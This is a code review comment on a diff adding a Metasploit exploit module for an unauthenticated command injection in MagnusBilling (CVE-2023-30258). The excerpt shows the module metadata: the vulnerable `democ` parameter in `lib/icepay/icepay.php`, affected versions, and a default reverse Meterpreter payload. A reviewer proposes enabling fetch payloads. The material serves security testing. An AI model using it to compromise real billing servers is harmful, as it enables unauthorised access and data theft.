modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb

```diff
@@ -0,0 +1,191 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Format::PhpPayloadPng
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Magnusbilling application unauthenticated Remote Command Execution.',
+        'Description' => %q{
+          A Command Injection vulnerability in magnusbilling application 6.x and 7.x allows
+          remote attackers to run arbitrary commands via unauthenticated HTTP request.
+          A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
+          The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
+          not properly sanitised/escaped.
+          After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
+          The commands run with the privileges of the web server process, typically `www-data`.
+          At a minimum, this allows an attacker to compromise the billing system and its database.
+
+          The following magnusbilling applications are vulnerable:
+          - Magnusbilling application version 6 (all versions);
+          - Magnusbilling application up to version 7.x and including commit 7af21ed620;
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Eldstal' # Discovery of the vulnerability
+
+        ],
+        'References' => [
+          ['CVE', '2023-30258'],
+          ['URL', 'https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258'],
+          ['URL', 'https://eldstal.se/advisories/230327-magnusbilling.html']
+        ],
+        'DisclosureDate' => '2023-06-26',
+        'Platform' => ['php', 'unix', 'linux'],
+        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
```

Comment:
This will allow for fetch based payloads to be used by this target. More info: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#what-are-fetch-payloads
```suggestion
              'Platform' => %w[unix, linux],
```

Reply:
See https://github.com/rapid7/metasploit-framework/pull/18481/commits/bfff35eb63c478194e5a76b702be7dde2dd5728d.